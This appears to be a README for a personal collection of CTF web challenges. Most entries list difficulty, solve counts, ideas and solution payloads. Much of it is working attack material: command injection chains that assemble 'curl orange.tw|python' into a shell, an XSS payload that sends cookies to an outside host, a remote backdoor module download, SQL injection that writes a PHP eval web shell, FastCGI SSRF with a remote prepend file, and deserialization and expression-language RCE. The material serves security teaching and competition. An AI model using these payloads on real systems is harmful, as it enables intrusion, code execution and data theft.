Collection of CTF Web challenges I made

Overview

My CTF Web Challenges

This is the repository of all CTF challenges I made, including the source code, write-up and idea explanation! Hope you like it :)

P.s. BTW, the Babyfirst series and One Line PHP Challenge are my favorite challenges. If you haven't enough time, please look them at least!


And you can find me via:


Table of Content


W3rmup PHP

Difficulty: ★★
Solved: 22 / 666
Tag: PHP, Code Review, YAML ,Command Injection

Source Code

Idea

  • The Norway Problem, the country code of Norway (NO) becomes False in YAML
  • Bypass the escapeshellarg by the logic problem of count() + unset()

Solution

  • TBD

Write Ups

  • TBD

One-Bit Man

Difficulty:
Solved: 49 / 666
Tag: PHP, Code Review

Source Code

Idea

You can flip 1-bit on any file of the latest version of WordPress and you have to pwn the server.

Solution

Flip the position 5389 of the file /var/www/html/wp-includes/user.php to NOP the NOT (!) operation.

    if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
            return new WP_Error(

Write Ups

  • TBD

Metamon Verse

Difficulty: ★★★☆
Solved: 9 / 666
Tag: NFS, SSRF ,RCE

Source Code

Idea

The idea is using the SSRF to communicate with the local NFS/RPC server to get the RCE. To complete the exploit, you have to:

  1. Construct the RPC/PORTMAP_CALL packet and send to gopher://127.0.0.1:111/ to get the port of mountd service.
  2. Construct the RPC/MNT_CALL packet and send to gopher://127.0.0.1:<mnt-port>/ to get the file-handler of /data volume (remember to specify CURLOPT_LOCALPORT to bypass the authentication)
  3. Construct the RPC/NFS_CALL packet and send to gopher://127.0.0.1:2049/ to create a SYMLINK (remember to specify CURLOPT_LOCALPORT to bypass the authentication)
  4. Symlink the /app/templates/index.html to a controllable file to get a SSTI and get the RCE!

Solution

An dirty exploit code can be found here

Write Ups

  • TBD

FBI Warning

Difficulty:
Solved: 25 / 666
Tag: MISC, OSINT ,PHP, Code Review

Source Code

Idea

The website uses a famous Message Board project futaba-ng, and the ID generation is based on REMOTE_ADDR:

define("IDSEED", 'idの種');       //idの種
...
$now.=" ID:".substr(crypt(md5($_SERVER["REMOTE_ADDR"].IDSEED.gmdate("Ymd", $time+9*60*60)),'id'),-8);

Solution

Because of the known IP prefix, you can identify the IP address of Ωrange by brute-force easily.

var_dump( substr(crypt(md5("219.91.64.47"."idの種"."20211203"),"id"),-8) == "ueyUrcwA" )
// bool(true)

Write Ups

  • TBD

Vulpixelize

Difficulty: ★☆
Solved: 41 / 666
Tag: Browser, Feature

Source Code

Idea

Use the Chrome new feature Text Fragments to extract the flag.

Solution

  • TBD

Write Ups

  • TBD

oShell

Difficulty: ★★
Solved: 21 / 1281
Tag: BlackBox, Shell ,Command Injection

Source Code

Solution

  1. Leveraging strace in htop to read enable secret.
  2. Writing /home/oShell/.toprc with tcpdump -w
  3. Abusing top inspect feature to run arbitrary commands

Write Ups

oStyle

Difficulty: ★★☆
Solved: 10 / 1281
Tag: XSS

Source Code

Solution

  • The default Apache installation enabled mod_negotiation, which allows .var mapping and you can specify arbitrary content-type there.

test.var

Content-language: en
Content-type: text/html
Body:----foo----

<script>
fetch('http://orange.tw/?' + escape(document.cookie))
</script>

----foo----

Write Ups

  • TBD

Return of Use-After-Flee

Difficulty: ★★★★★
Solved: 0 / 1281
Tag: WhiteBox, PHP, UAF, PWN

Source Code

Solution

  • Exploiting CVE-2015-0273 to pop the shell without known binaries. More detail will be published in my blog soon.

Write Ups

  • TBD

Virtual Public Network

Difficulty: ★☆
Solved: 81 / 1147
Tag: WhiteBox, Perl, Command Injection

Source Code

Solution

http://13.231.137.9/cgi-bin/diag.cgi
?options=-r@a="ls -alh /",system@a%23 2>tmp/orange.thtml <
&tpl=orange

Write Ups

  • TBD

Bounty Pl33z

Difficulty: ★★★☆
Solved: 30 / 1147
Tag: XSS

Source Code

Solution

Here we use unicode U+2028 and U+3002 to bypass \n and . filters.

http://3.114.5.202/fd.php
?q=ssl。orange。tw?xx"%2bdocument[`cookie`]%E2%80%A8-->

Unintended Solution

  • Nesting template expression
http://3.114.5.202/fd.php
?q=ssl。orange。tw?`%2b"%2bdocument[`cookie`];(`${`

Write Ups

  • TBD

GoGo PowerSQL

Difficulty: ★★★☆
Solved: 16 / 1147
Tag: Environment Injection, MySQL Client Attack

Source Code

Solution

  1. Buffer Overflow the DB_HOST in BSS
  2. Due to the patch, we can pollute environment variable which are not in the Blacklist.
  3. Hijack MySQL connection by ENV such as LOCALDOMAIN or HOSTALIAES
  4. Read /FLAG by LOAD DATA LOCAL INFILE.
import requests

payload = ['x=x' for x in range(254)]
payload.append('name=x')
payload.append('HOSTALIASES=/proc/self/fd/0')
payload.append('orangeeeee=go')
payload = '&'.join(payload)

data = 'orangeeeee my.orange.tw'

r = requests.post('http://13.231.38.172/cgi-bin/query?'+payload, data=data)
print r.content
$ git clone https://github.com/lcark/MysqlClientAttack.git
$ cd MysqlClientAttack
$ python main.py -F /FLAG

Write Ups

  • TBD

Luatic

Difficulty: ★★☆
Solved: 42 / 1147
Tag: WhiteBox, Redis, Lua

Source Code

Solution

  1. Override PHP global variables.
  2. Redis implements eval command by string concatenations so that we can escape the original Lua function to override global objects.
http://54.250.242.183/luatic.php
?_POST[TEST_KEY]=return 1 end function math:random() return 2
&_POST[TEST_VALUE]=0
&_POST[MY_SET_COMMAND]=eval
&_POST[token]=<token>
&_POST[guess]=2
http://54.250.242.183/luatic.php
?_POST[token]=<token>
&_POST[guess]=2

Unintended Solution

  • Lua is so magic that there are several unintended solutions. Sorry for the imperfect challenge :(

Write Ups

  • TBD

Buggy .Net

Difficulty: ★☆
Solved: 13 / 1147
Tag: ASP.NET, WhiteBox

Source Code

Solution

GET / HTTP/1.1
Host: buggy
Content-Type: application/x-www-form-urlencoded; charset=ibm500
Content-Length: 61

%86%89%93%85%95%81%94%85=KKaKKa%C6%D3%C1%C7K%A3%A7%A3&x=L%A7n
from urllib import quote

s = lambda x: quote(x.encode('ibm500'))
print '%s=%s&x=%s' % (s('filename'), s('../../FLAG.txt', s('<x>'))

Write Ups

  • TBD

One Line PHP Challenge

Difficulty: ★★★★
Solved: 3 / 1816
Tag: PHP

Source Code

Solution

P.S. This is a default installation PHP7.2 + Apache on Ubuntu 18.04

  1. Control partial session file content by PHP_SESSION_UPLOAD_PROGRESS
  2. Bypass session.upload_progress.cleanup = On by race condition or slow query
  3. Control the prefix to @<?php by chaining PHP wrappers

Write Ups

Baby Cake

Difficulty: ★★★
Solved: 4 / 1816
Tag: Code Review, PHP, De-serialization

Source Code

Solution

Due to the implement of CURLOPT_SAFE_UPLOAD in CakePHP FormData.php. We can read arbitrary files!

# arbitrary file read, listen port 12345 on your server
http://13.230.134.135/
?url=http://your_ip:12345/
&data[x]=@/etc/passwd

# arbitrary de-serialization the Monolog POP chain
http://13.230.134.135/
?url=http://your_ip:12345/
&data[x]=@phar://../tmp/cache/mycache/[you_ip]/[md5_of_url]/body.cache

Write Ups

Oh My Raddit

Difficulty: ★★☆
Solved: 27 / 1816
Tag: Observation, DES checksum, Crypto, Web

Source Code

Solution

  1. Know ECB mode from block frequency analysis
  2. Know block size = 8 from cipher length
  3. From the information above, it's reasonable to use DES in real world
  4. The most common block is 3ca92540eb2d0a42(always in the cipher end). We can guess it's the padding \x08\x08\x08\x08\x08\x08\x08\x08
  5. Due to the checking parity in DES, we can reduce the keyspace from 26(abcdefghijklmnopqrstuvwxyz) to 13(acegikmoqsuwy)
    • Break in 1 second with HashCat
    • Break in 10 minutes with single thread Python

Write Ups

Oh My Raddit v2

Difficulty: ★★
Solved: 10 / 1816
Tag: Web.py, SQL Injection to RCE

Source Code

Solution

Write Ups

Why so Serials?

Difficulty: ★★★★
Solved: 1 / 1816
Tag: De-serialization, RCE, ASP.NET, View State

Source Code

Solution

  1. Get the machineKey in web.config by Server-Side-Includes(.shtml or .stm)
  2. Exploit ASP.NET ___VIEWSTATE by ysoserial.net

Write Ups

BabyFirst Revenge

Difficulty: ★☆
Solved: 95 / 1541
Tag: WhiteBox, PHP, Command Injection

Idea

  • Command Injection, but only in 5 bytes

Source Code

Solution

# generate `ls -t>g` to file "_"
http://host/?cmd=>ls\
http://host/?cmd=ls>_
http://host/?cmd=>\ \
http://host/?cmd=>-t\
http://host/?cmd=>\>g
http://host/?cmd=ls>>_

# generate `curl orange.tw|python` to file "g"
http://host/?cmd=>on
http://host/?cmd=>th\
http://host/?cmd=>py\
http://host/?cmd=>\|\
http://host/?cmd=>tw\
http://host/?cmd=>e.\
http://host/?cmd=>ng\
http://host/?cmd=>ra\
http://host/?cmd=>o\
http://host/?cmd=>\ \
http://host/?cmd=>rl\
http://host/?cmd=>cu\
http://host/?cmd=sh _

# got shell
http://host/?cmd=sh g

You can check the exploit.py for the detail! And there are also lots of creative solutions, you can check the write ups below.

Write Ups

BabyFirst Revenge v2

Difficulty: ★★★★
Solved: 8 / 1541
Tag: WhiteBox, PHP, Command Injection

Idea

  • Command Injection, but only in 4 bytes

Source Code

Solution

  1. generate g> ht- sl to file v
  2. reverse file v to file x
  3. generate curl orange.tw|python;
  4. execute x, ls -th >g
  5. execute g

You can check exploit.py for the detail!

Write Ups

SSRFme?

Difficulty: ★★☆
Solved: 20 / 1541
Tag: WhiteBox, Perl, PATH Pollution

Idea

  • CVE-2016-1238 (But the latest version of Ubuntu 17.04 in AWS is still vulnerable)
  • Perl lookup current directory in module importing
  • Perl module URI/lib/URI.pm#L136 will eval if there is a unknown scheme

Source Code

$ sudo apt install libwww-perl

Solution

# write evil URI module to current directory
$ curl http://host/?filename=URI/orange.pm&url=http://orange.tw/w/backdoor.pl

# eval evil module `orange`
$ curl http://host/?filename=xxx&url=orange://orange.tw

Write Ups

SQL so Hard

Difficulty: ★★★
Solved: 10 / 1541
Tag: WhiteBox, MySQL, PostgreSQL, SQL Injection, Code Injection

Idea

Source Code

Solution

Write Ups

Baby^H Master PHP 2017

Difficulty: ★★★★☆
Solved: 0 / 1541
Tag: WhiteBox, PHP, Serialization, Apache Prefock

Idea

  • PHP do the de-serialization on PHAR parsing
  • PHP assigned a predictable function name \x00lambda_%d to an anonymous function
  • Break shared VARIABLE state in Apache Pre-fork mode

Source Code

Solution

# get a cookie
$ curl http://host/ --cookie-jar cookie

# download .phar file from http://orange.tw/avatar.gif
$ curl -b cookie 'http://host/?m=upload&url=http://orange.tw/'

# force apache to fork new process
$ python fork.py &

# get flag
$ curl -b cookie "http://host/?m=upload&url=phar:///var/www/data/$MD5_IP/&lucky=%00lambda_1"

Write Ups

papapa

Difficulty:
Solved: 71 / 1024
Tag: BlackBox, SSL, Pentesting

Idea

  • Leak the internal hostname from SSL certificate

Source Code

Solution

$ openssl s_client -showcerts -connect 1.2.3.4:443 < /dev/null | openssl x509 -text | grep -A 1 "Subject Alternativer Name"
...
depth=0 C = TW, ST = Some-State, O = Internet Widgits Pty Ltd, CN = very-secret-area-for-ctf.orange.tw, emailAddress = [email protected]
...
# get flag
$ curl -k  -H "host: very-secret-area-for-ctf.orange.tw" https://1.2.3.4/

Write Ups

Leaking

Difficulty: ★★
Solved: 43 / 1024
Tag: WhiteBox, JavaScript, NodeJS

Idea

Source Code

Solution

$ while true; do curl 'http://1.2.3.4/?data=Buffer(1e4)' | grep -a hitcon; done;

Write Ups

BabyTrick

Difficulty: ★★★
Solved: 24 / 1024
Tag: WhiteBox, PHP, MySQL, SQL Injection, Unserialize

Idea

Source Code

Solution

# get password
curl http://1.2.3.4/
?data=O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:1:{i:0;s:39:"'union%20select%201,2,password%20from%20users%23";}}

# get flag
curl http://1.2.3.4/
?data=O:6:"HITCON":2:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:7:"orÄnge";i:1;s:13:"babytrick1234";}}

Write Ups

Angry Boy

Difficulty: ★★☆
Solved: 43 / 1024
Tag: GrayBox, Java

Idea

Source Code

Solution

Write Ups

Angry Seam

Difficulty: ★★★★
Solved: 4 / 1024
Tag: GrayBox, Java, Seam Framework, CSS RPO, EL Injection, Java Deserialization

Idea

Source Code

Solution


P.s. I made this challenge because once when I try to review the code of Seam Framework, I found some 0-days and I think it must have more. So I throw out the brick to attract a jade. And the result is more than I expected :P


Intended solution

  • Register an account

    username: `AAAAAA`    
    password: `AAAAAA`  
    realname: `{/*';*/}%0a@import'http://orange.tw/?`  
    
  • Report URL

    http://1.2.3.4:8080/angryseam/profile.seam?actionOutcom>e=/profile.seam?username%3dAAAAAA
    

Unintended solution

  • Register an account
  • Update description to
  • Login and access
/?x=#{expressions.instance().createValueExpression(request.getHeader('cmd')).getValue()}
GET /angryseam/template.seam?actionMethod=template.xhtml:util.escape(sessionScope['user'].getDescription()) HTTP/1.1
host: 1.2.3.4
cmd: #{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),request.getHeader('ccc'))}
ccc: ls -alh
...

Unintended solution

  • CVE-2013-2165 Java deserialization vulnerability

Unintended solution

  • SESSION manipulation... seam SUCKS

Write Ups

Babyfirst

Solved: 33 / 969
Difficulty: ★★
Tag: WhiteBox, PHP, Command Injection

Idea

  • Use NewLine to bypass regular expression check
  • Command injection only with alphanumeric characters

Source Code

<?php
    highlight_file(__FILE__);

    $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];
    if ( !file_exists($dir) )
        mkdir($dir);
    chdir($dir);

    $args = $_GET['args'];
    for ( $i=0; $i<count($args); $i++ ){
        if ( !preg_match('/^\w+$/', $args[$i]) )
            exit();
    }

    exec("/bin/orange " . implode(" ", $args));
?>

Solution

http://localhost/
?args[0]=x%0a
&args[1]=mkdir
&args[2]=orange%0a
&args[3]=cd
&args[4]=orange%0a
&args[5]=wget
&args[6]=846465263%0a

http://localhost/
?args[0]=x%0a
&args[1]=tar
&args[2]=cvf
&args[3]=aa
&args[4]=orange%0a
&args[5]=php
&args[6]=aa

And there are also lots of creative solutions, you can check the write ups below.

Write Ups

nanana

Difficulty: ★★★
Solved: 18 / 969
Tag: GrayBox, C, PWN

Idea

  • Pwn without library
  • Format String without output
  • Bypass Stack Guard by using overflow ARGV[1]

Source Code

Solution

Write Ups

Giraffe's Coffee

Difficulty: ★★★☆
Solved: 16 / 969
Tag: WhiteBox, PHP

Idea

  • Break PHP PRNG
  • Break shared PRNG STATE in Apache Prefork mode

Source Code

Solution

TBD

Write Ups

lalala

Difficulty: ★★★☆
Solved: 2 / 969
Tag: BlackBox, PHP, SSRF

Idea

  • Bypass SSRF restrictiton with 302 redirect
  • Exploit FASTCGI protocol by using GOPHER

Source Code

Solution

<?php
header( "Location: gopher://127.0.0.1:9000/x%01%01Zh%00%08%00%00%00%01%00%00%00%00%00%00%01%04Zh%00%86%00%00%0E%03REQUEST_METHODGET%0F%0ASCRIPT_FILENAME/www/a.php%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%09%26PHP_VALUEauto_prepend_file%20%3D%20http%3A//orange.tw/x%01%04Zh%00%00%00%00%01%05Zh%00%00%00%00" );

Write Ups

Use-After-FLEE

Solved: 1 / 969
Difficulty: ★★★★☆
Tag: WhiteBox, PHP, UAF, PWN

Idea

Source Code

Solution

TBD

Write Ups

PUSHIN CAT

Solved: 8 / 1020
Difficulty: ★★
Platform: BlackBox, PHP, H2, SQL Injection

Idea

  • SQL Injection on H2 Database
  • Execute Code by using H2 SQL Injection

Source Code

Solution

TBD

Write Ups

PY4H4SHER

Solved: 30 / 1020
Difficulty: ★★☆
Tag: WhiteBox, Python, Collision, HPP

Idea

Source Code

Solution

TBD  

Write Ups

LEENODE

Solved: 2 / 1020
Difficulty: ★★★
Tag: BlackBox, ColdFusion, Apache

Idea

  • Multilayered architecture vulnerability
  • Double Encoding

Source Code

Solution

# get password
$ curl http://1.2.3.4/admin%252f%252ehtpasswd%2500.cfm

# get flag
$ curl http://1.2.3.4/admin/thefl4g.txt 

Write Ups

BlackBox

Solved: 0 / 12
Difficulty: ★★★★
Tag: GrayBox, PHP, JAVA, mod_jk, H2, SQL Injection, WAF

Idea

  • Multilayered architecture vulnerability
  • Default and up to date mod_jk leads to directory travesal
  • Bypass WAF by incorrect usage of BASE64 and URLENCODE
  • SQL Injection on H2 Database
  • Execute Code by using H2 SQL Injection

Source Code

Solution

  • Get source code

    http://1.2.3.4/login/..;/
    
  • Review code and find a way to bypass WAF

    $ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,version(),null--"
    $ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_read('/etc/apache2/sites-enabled/000-default.conf'),null--"
  • Write shell

    $ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_write('3c3f706870206576616c28245f504f53545b6363635d293b3f3e', '/www/write_shell_here_=P/.a.php'),null--"
    $ curl "http://1.2.3.4/write_shell_here_=P/.a.php" -d 'phpinfo();'

Write Ups

TBD

SQLPWN

Solved: 0 / ??
Difficulty: ★★★
Tag: WhiteBox, PHP, SQL Injection, LFI, Race Condition

Idea

  • One-byte off SQL Injection
  • Race Condition
  • Local file inclusion with PHP session

Source Code

Solution

  • Run exploit.py to win race condition

  • Login and SQL Injection

    $ curl http://1.2.3.4/sqlpwn.php -d 'title=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\&note=, concat(0x3a3a3a3a3a3a,(select pass from users where name=0x6f72616e6765)))#'
  • Local file inclusion with session

    $ curl http://1.2.3.4/sqlpwn.php?mode=admin&boom=../../../../../../var/lib/php5/sess_243220

Write Ups

You might also like...
MenuCard - Employees can login with already made admin accounts

MenuCard Symfony 5.4.2 application Employees can login with already made admin accounts. Employees can manages create new accounts for new employees.

This Toko Lego e-commerce application is made to meet the final semester exam.

This Toko Lego e-commerce application is made to meet the final semester exam. Created using laravel framework.

Learning Management System made in vanilla PHP to learn core concepts and usage of some basic utils

Learning Management System Learning Management System made in vanilla PHP to learn core concepts and usage of some basic utils. Report Bug · Request F

🌶🥗🧀🍉 Brazilian Table of Food Composition made by IBGE - Laravel 9 REST API

About API of the 2008-2009 Family Budget Survey: tables of nutritional composition of foods consumed in Brazil / IBGE, Coordination of Work and Income

A Real time chat app made in Next.js, Laravel and Ably.

Chat App with Next.js, Laravel and Ably This repository serves as a code container for the tutorial I wrote on Ably's Blog. Blog link will be updated

Instagram Clone App made with Laravel a PHP Framework

About Laravel Laravel is a web application framework with expressive, elegant syntax. We believe development must be an enjoyable and creative experie

Library JGU is a website created for a university library system information. Made with PHP & TailwindCSS.
Library JGU is a website created for a university library system information. Made with PHP & TailwindCSS.

Library JGU Library JGU is a website created for a university library system information. Made with PHP & TailwindCSS. Key Features • How To Use • Rel

TinyFileManager is web based file manager and it is a simple, fast and small file manager with a single file, multi-language ready web application
TinyFileManager is web based file manager and it is a simple, fast and small file manager with a single file, multi-language ready web application

TinyFileManager is web based file manager and it is a simple, fast and small file manager with a single file, multi-language ready web application for storing, uploading, editing and managing files and folders online via web browser. The Application runs on PHP 5.5+, It allows the creation of multiple users and each user can have its own directory and a build-in support for managing text files with cloud9 IDE and it supports syntax highlighting for over 150+ languages and over 35+ themes.

Kyle is a web application built with Laravel for web developers and small companies to efficiently track and stay on top of yearly expenses related to services
Kyle is a web application built with Laravel for web developers and small companies to efficiently track and stay on top of yearly expenses related to services

Kyle Kyle is a web application built with Laravel for web developers and small companies to efficiently track and stay on top of yearly expenses relat

Comments
  • Fix payload padding to avoid loop

    Fix payload padding to avoid loop

    Hey,

    Thanks for the awesome challenge (and the solving script)! I would like to make a friendly contribution :)

    In order to avoid padding for a single base64 encoding, we need the length l of our initial message to be a multiple of 3, as three 8-bit characters are encoded as exactly four 6-bit/base64 characters.

    The length of the resulting message will be l × 4 / 3, since three characters are encoded into four. len(x) = l × 4 / 3 len(xx) = l × 4 / 3 × 4 / 3 len(xxx) = l × 4 / 3 × 4 / 3 × 4 / 3

    For xxx to not contain padding, we need len(xx) to be a multiple of 3; same reasoning for len(xx), for which you need len(x) to be a multiple of 3, and len(x) for which you need l to be a multiple of 3.

    Since 3 and 4 are coprime, we can sort of remove the 4 from the equations for our reasoning. Hence, we need: l % 3 == 0 && len(x) % 3 == 0 && len(xx) % 3 == 0 <=> l % 3 == 0 && l / 3 % 3 == 0 && l / 3 / 3 % 3 == 0 <=> l % 3^3 == 0 <=> l % 27 == 0

    Sorry for the long-winded (possibly unneeded?) explanation!

    opened by bchetioui 4
  • Hitcon 2015 lalala web400 task 这个writeup奇怪

    Hitcon 2015 lalala web400 task 这个writeup奇怪

    返回的数据经过了check_image函数才能保存到磁盘中,那么这个writeup中用file:///index.php读的内容,应该不能保存到磁盘中.

    那么是怎么可以读到index.php,或者/etc/nginx/sites-enabled/default文件呢?

            if ( $http_info['http_code'] == 404 ){
                alert('not found');
            } else{
                if ( check_image($data) )
                    file_put_contents($DIR . $filename, $data);
            }
    
    opened by leveryd 1
Owner
Orange Tsai
Orange Tsai
This is a Reddit-like clone named Scroller, made for the project component of COSC 360 - Web Programming.

The COSC 360 Project Due Dates: See Milestone Dates Overview: The project is designed to help develop your skills for full stack development. With thi

null 3 Jun 30, 2022
Web app to share your favorite photos, made with laravel

Kuro Photos Web app to share your favorite photos, made with laravel. This web app was made for educationals purposes only. I enjoyed so much learning

Julian Salcedo Torres 4 Dec 29, 2022
This repository contains collection of portfolio's .

Welcome to the repository ?? This repository contains collection of portfolio's . You can add your own repository. How to contribute to this repositor

Avinash Singh 86 Dec 22, 2022
User input collection of recipes that can be filtered to meet certain criteria or to return a random recipe.

How to use: Install xampp: https://www.apachefriends.org/index.html and PHP Unzip the repo in the C:/xampp/htdocs directory Run xampp and turn on the

kristiyan 1 Jan 27, 2022
Server manager is a open source project made for people so that they can add the servers to one single place irrespective of their provider and manage it through one location.

Server Manager Are you sick of having to log into hundreads of different website just to access your server? Well we got you, Server manager is a open

null 8 Aug 9, 2022
LaraEstimate is a complete Dynamic Estimates/Quotes System made with Laravel 7 and VueJS.

LaraEstimate LaraEstimate is a complete Dynamic Estimates/Quotes System made with Laravel 7 and VueJS. The system has the following features: Allows t

Tiago S. P. Rodrigues 133 Dec 12, 2022
A blog made with Lumen Framework

A Lumen Blog Your first step towards mastering Lumen. Requirements Docker Installation and usage This is a template repository: don't work directly on

null 13 Nov 16, 2022
A dumb sharing site for photos and videos, made by me, using a bit of borrowed code.

ShitShare A dumb sharing site for photos and videos, made by me, using a bit of borrowed code. Information This was made on Windows, so when video upl

null 1 Dec 14, 2022
Twitter like application made with Laravel in 10 hours. Demo at

Critter, A Twitter like application written with Laravel in under 10 hours by @msurguy Imagine Twitter is down again. It's dark outside, and how can y

Maksim Surguy 58 Nov 30, 2022
Database version control, made easy!

Database version control, made easy! dbv.php is a database version control web application featuring schema management, revision scripts, and more! Ch

Victor Stanciu 1.7k Dec 9, 2022